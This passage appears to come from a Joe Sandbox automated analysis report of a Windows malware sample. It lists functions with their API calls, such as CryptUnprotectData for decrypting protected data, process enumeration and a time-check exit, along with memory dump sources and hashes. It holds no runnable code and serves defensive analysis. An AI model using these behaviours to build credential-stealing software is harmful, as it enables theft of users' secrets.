                              • Instruction Fuzzy Hash: 77B2C0F360C6149FE304AF2DDC8567ABBE5EF94720F16492DEAC4C7744EA3598008A97
                              Function 0064C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0064C871
                              • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0064C87C
                              • lstrcat.KERNEL32(?,00660B46), ref: 0064C943
                              • lstrcat.KERNEL32(?,00660B47), ref: 0064C957
                              • lstrcat.KERNEL32(?,00660B4E), ref: 0064C978
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$BinaryCryptStringlstrlen
                              • String ID:
                              • API String ID: 189259977-0
                              • Opcode ID: 0de93101ec7d673f323d8f6d9657d294fcaac163dd8ee23a2ec4c573112342a0
                              • Instruction ID: cbdc38172746a2e66e79561850e3792ecf3448c1b5f7dd7dd59e916e145c4150
                              • Opcode Fuzzy Hash: 0de93101ec7d673f323d8f6d9657d294fcaac163dd8ee23a2ec4c573112342a0
                              • Instruction Fuzzy Hash: 8E4190B590420AEFDB10DF94DD89BFEB7B9BB48304F1041A9E509A62C0D7745A84CF91
                              Function 00656920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                              Download Yara Rule
                              APIs
                              • GetSystemTime.KERNEL32(?), ref: 0065696C
                              • sscanf.NTDLL ref: 00656999
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006569B2
                              • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 006569C0
                              • ExitProcess.KERNEL32 ref: 006569DA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Time$System$File$ExitProcesssscanf
                              • String ID:
                              • API String ID: 2533653975-0
                              • Opcode ID: 1998085515d4620dac190f3193b219456dcc7b3d67b3dcb70af7a3772633aa88
                              • Instruction ID: 1068067ea76edfa09e62de50e450481e7b7ba23dc9a6e2ff6a105bb4c612cba0
                              • Opcode Fuzzy Hash: 1998085515d4620dac190f3193b219456dcc7b3d67b3dcb70af7a3772633aa88
                              • Instruction Fuzzy Hash: 8121CB75D14209ABDF48EFE8D9459EEB7B6BF48301F04852EE406E3250EB345609CB69
                              Function 00647240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0064724D
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00647254
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00647281
                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 006472A4
                              • LocalFree.KERNEL32(?), ref: 006472AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                              • String ID:
                              • API String ID: 2609814428-0
                              • Opcode ID: 3af5cda15f97ab6ae60d142d200be5e3c876175e54701f3391409ef624c89c63
                              • Instruction ID: 2232ac8f5c80fa26fe0df798caf4c545def6a7f3751917953b227c96896dc8a9
                              • Opcode Fuzzy Hash: 3af5cda15f97ab6ae60d142d200be5e3c876175e54701f3391409ef624c89c63
                              • Instruction Fuzzy Hash: 57010CB5A40208BBEB14DFD8CD4AF9E77B9BB44B01F104555FB05AA2C0D6B0AA018B65
                              Function 00659600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0065961E
                              • Process32First.KERNEL32(00660ACA,00000128), ref: 00659632
                              • Process32Next.KERNEL32(00660ACA,00000128), ref: 00659647
                              • StrCmpCA.SHLWAPI(?,00000000), ref: 0065965C
                              • CloseHandle.KERNEL32(00660ACA), ref: 0065967A
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                              • String ID:
                              • API String ID: 420147892-0
                              • Opcode ID: eebca51e3c84acb8dfe33835b495414ffa3eaf4edb6d119087b794b4c5fbb1ef
                              • Instruction ID: 14afc7dac8e80bd6206684722198ec4349b711108935105590febed3a3addf96
                              • Opcode Fuzzy Hash: eebca51e3c84acb8dfe33835b495414ffa3eaf4edb6d119087b794b4c5fbb1ef
                              • Instruction Fuzzy Hash: DF011E75A00208EBEB14DFA5DD58BEDB7F9FB48701F104199A906A7280D7349B48DF61
                              Function 00A13B86 Relevance: 6.6, Strings: 4, Instructions: 1583COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: =Ym$CB}$R\ho$rlW
                              • API String ID: 0-2616180302
                              • Opcode ID: 52738c337ded386159495c208f7c73ee20012dc8f00b79a7a91e1dd92801d5c2
                              • Instruction ID: 94c41ebf19718eda4b9c0817d381603adb4c77997c0f0bd0266f46c6cfa58bb5
                              • Opcode Fuzzy Hash: 52738c337ded386159495c208f7c73ee20012dc8f00b79a7a91e1dd92801d5c2
                              • Instruction Fuzzy Hash: F5B2F6B3A0C2049FD7046E2DEC85A7AFBE9EF94760F1A493DE6C4C7340EA3558058697
                              Function 00658EA0 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptBinaryToStringA.CRYPT32(00000000,00645184,40000001,00000000,00000000,?,00645184), ref: 00658EC0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: BinaryCryptString
                              • String ID:
                              • API String ID: 80407269-0
                              • Opcode ID: da1703ca575aeef66a34585157ce20ff527524285f5b7750f10f2d0b00cc341d
                              • Instruction ID: 01d5affac59e9f69e3b80bccfd25d5d5ddce617b6347227af7f14ec330ea2138
                              • Opcode Fuzzy Hash: da1703ca575aeef66a34585157ce20ff527524285f5b7750f10f2d0b00cc341d
                              • Instruction Fuzzy Hash: A0110670200208AFDB04CF68EC85FAA37AABF89345F109458FD1A9B651DB35E845DB60
                              Function 00657A30 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                              Download Yara Rule
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,013DE4D8,00000000,?,00660E10,00000000,?,00000000,00000000), ref: 00657A63
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00657A6A
                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,013DE4D8,00000000,?,00660E10,00000000,?,00000000,00000000,?), ref: 00657A7D
                              • wsprintfA.USER32 ref: 00657AB7
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                              • String ID:
                              • API String ID: 3317088062-0
                              • Opcode ID: cefb6ee6c3eefd92d2b4e8b37a67240be5be9f9531fd7b2e903142f084abdc48
                              • Instruction ID: 0e8a861efac249e61a63d6a3deb49ef87b90564063413c56c409d20af6903c48
                              • Opcode Fuzzy Hash: cefb6ee6c3eefd92d2b4e8b37a67240be5be9f9531fd7b2e903142f084abdc48
                              • Instruction Fuzzy Hash: FB1161B1945218EBEB24CF58DC49FAAB779FB04721F1043AAEA1A932C0D7745E44CF51
                              Function 00A12074 Relevance: 5.4, Strings: 3, Instructions: 1662COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: Ut_$cS~o$hDzu
                              • API String ID: 0-2708838273
                              • Opcode ID: 054497b3a2a99542d1801253fd75c4fc834e7ce04721599d4facf83747844b7e
                              • Instruction ID: c0c43790dc0195cb4fe5e07862b4320fadcff63c6ed93c064161e9197c65fe2b
                              • Opcode Fuzzy Hash: 054497b3a2a99542d1801253fd75c4fc834e7ce04721599d4facf83747844b7e
                              • Instruction Fuzzy Hash: F7B219F3A0C2009FE7046E2DDC8577ABBE9EF94320F1A453DEAC5D3744EA3598058696
                              Function 00653720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON
                              Download Yara Rule
                              APIs
                              • CoCreateInstance.COMBASE(0065E118,00000000,00000001,0065E108,00000000), ref: 00653758
                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 006537B0
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: ByteCharCreateInstanceMultiWide
                              • String ID:
                              • API String ID: 123533781-0
                              • Opcode ID: f6dc8dc4f496d5e0f2941d7a710d6a0bc49effab03a1f8f9d098e3c1a33a31c1
                              • Instruction ID: 0dd404c91ac4cdff90634db1df71376eff37530d9518662fb7b9d43759f22bd5
                              • Opcode Fuzzy Hash: f6dc8dc4f496d5e0f2941d7a710d6a0bc49effab03a1f8f9d098e3c1a33a31c1
                              • Instruction Fuzzy Hash: 0341E771A40A289FDB28DF58CC95B9BB7B5BB48702F4041D8E609E72D0E771AE85CF50
                              Function 00649B60 Relevance: 4.6, APIs: 3, Instructions: 51memoryencryptionCOMMON
                              Download Yara Rule
                              APIs
                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00649B84
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00649BA3
                              • LocalFree.KERNEL32(?), ref: 00649BD3
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID: Local$AllocCryptDataFreeUnprotect
                              • String ID:
                              • API String ID: 2068576380-0
                              • Opcode ID: e3a172c6695ed2451d67baee2c3bf4ec9740a093165ee245ff1ef706d898ea56
                              • Instruction ID: 4da4684bac379cd076a0fd42f6acd149eb489e15cc3aafda4c452fdebe0d15d1
                              • Opcode Fuzzy Hash: e3a172c6695ed2451d67baee2c3bf4ec9740a093165ee245ff1ef706d898ea56
                              • Instruction Fuzzy Hash: 5811CCB4A00209DFDB04DF98D985AAE77B5FF88300F104599E915A7390D774AE10CF61
                              Function 00A0B602 Relevance: 4.0, Strings: 2, Instructions: 1539COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2188162864.000000000089E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00640000, based on PE: true
                              • Associated: 00000000.00000002.2188013785.0000000000640000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188029200.000000000088A000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000A25000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000AFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B28000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B30000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188162864.0000000000B3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188484807.0000000000B3F000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188589058.0000000000CDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2188603260.0000000000CDE000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_640000_XDPT5mgIBO.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: !&oo$Rwa
                              • API String ID: 0-1885050741
                              • Opcode ID: 58f6d2ba12da48e77bb6b1aaedd064402fc28dab5cfb5ed314d740071e813ab5
                              • Instruction ID: 12becacc7b8841fb28759fe8791347db4d4a6c3c6de8f770b7d7bad547aebd8f
                              • Opcode Fuzzy Hash: 58f6d2ba12da48e77bb6b1aaedd064402fc28dab5cfb5ed314d740071e813ab5
